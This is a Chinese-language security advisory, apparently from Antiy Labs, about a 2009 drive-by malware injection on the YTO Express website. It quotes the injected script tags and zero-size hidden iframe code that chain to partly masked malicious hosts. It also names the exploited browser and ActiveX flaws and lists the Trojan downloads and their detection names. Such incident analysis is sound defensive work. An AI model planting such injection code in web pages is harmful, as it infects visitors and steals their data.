圆通速递网站挂马事件

2月2日，安天实验室发现，圆通速递网站2009年春节假期安排页面(http://www.yto.net.cn/News/list.asp?id=842)被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。安天实验室提醒广大网民：在春节假期以及节后上班期间，挂马者专门选择一些高访问量的页面以及大家关心的春节旅游、车票网站等页面进行挂马。我们可以看到圆通速递被挂马的这个页面至今已经有超过7万次的访问量，对广大网民造成了很大的危害。
            该网站问题代码：
            
            <script src=http://3****.c%6Fm/c.js></script>
            <script src=http://s581.3***.org/c.js></script>
            这两个链接最终都是链接到http://www.2009****.cn/llsg/2.htm这个挂马链接。
            http://s581.3***.org/c.js 问题框架代码：
            
            document.writeln("document.write(\'<iframe src=http:\/\/www.2009****.cn\/llsg\/2.htm width=0 height=0>
            http://www.2009****.cn/llsg/2.htm问题框架代码：
            
            <iframe src=http://www.712****.cn/a114/fxx.htm width=100 height=0></Iframe>
            http://www.712****.cn/a114/fxx.htm网马代码：
            
            该加密网马解密后可知利用以下漏洞来传播：
            MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
            暴风影音播放器MPS.StormPlayer漏洞
            RealPlayer播放器IERPCtl.IERPCtl.1漏洞
            联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
            Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏漏洞
            Adobe Flash Player SWF文件漏洞
            微软IE7漏洞            当用户访问http://www.yto.net.cn/News/list.asp?id=842时，系统会自动下载以下病毒文件：
              http://d.a****.com/new/a1.css            病毒名：(Trojan/Win32.Murlo.aab[Downloader])
              http://d.a****.com/new/a114.css           病毒名：(Trojan/Win32.Murlo.aab[Downloader])
              http://www.w****.com/new/new1.exe         病毒名：(Trojan/Win32.WOW.ewz[GameThief])
              http://www.w****.com/new/new2.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new3.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new4.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new5.exe         病毒名：(Trojan/Win32.Agent.sc[Spy])
              http://www.w****.com/new/new6.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new7.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new8.exe         病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new9.exe         病毒名：(Worm/Win32.Downloader.yv)
              http://www.w****.com/new/new10.exe        病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new11.exe        病毒名：(Trojan/Win32.Agent.bnqy)
              http://www.w****.com/new/new12.exe        病毒名：(Worm/Win32.Downloader.zx)
              http://www.w****.com/new/new13.exe        病毒名：(Worm/Win32.Downloader.zd)
              http://www.w****.com/new/new14.exe        病毒名：(Trojan/Win32.Agent.blre)
              http://www.w****.com/new/new15.exe        病毒名：(Trojan/Win32.OnLineGames.ulgq[GameThief])
              http://www1.w****.com/new/new16.exe       病毒名：(Worm/Win32.Downloader.zd)
              http://www1.w****.com/new/new17.exe       病毒名：(Trojan/Win32.Agent.bknn)
              http://www1.w****.com/new/new18.exe       病毒名：(Trojan/Win32.Agent.bkpt)
              http://www1.w****.com/new/new19.exe       病毒名：(Worm/Win32.Downloader.zx)
              http://www1.w****.com/new/new20.exe       病毒名：(Trojan/Win32.Pakes.mqh)
              http://www1.w****.com/new/new21.exe       病毒名：(Worm/Win32.Downloader.zx)
              http://www1.w****.com/new/new22.exe       病毒名：(Trojan/Win32.Agent.blmy)
              http://www1.w****.com/new/new23.exe       病毒名：(Trojan/Win32.Agent.adxr[Dropper])
              http://www1.w****.com/new/new24.exe       病毒名：(Trojan/Win32.Agent.afqg[Dropper])
              http://www1.w****.com/new/new25.exe       病毒名：(Trojan/Win32.Small.cah[Spy])
              http://www1.w****.com/new/new26.exe       病毒名：(Worm/Win32.Downloader.zd)
              http://www1.w****.com/new/new27.exe       病毒名：(Trojan/Win32.Lmir.ckv[GameThief])
              http://www1.w****.com/new/new28.exe       病毒名：(Trojan/Win32.Agent.ahzz)
              以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会盗取用户敏感信息，甚至导致死机。由于下载数量太多，这里不一一分析。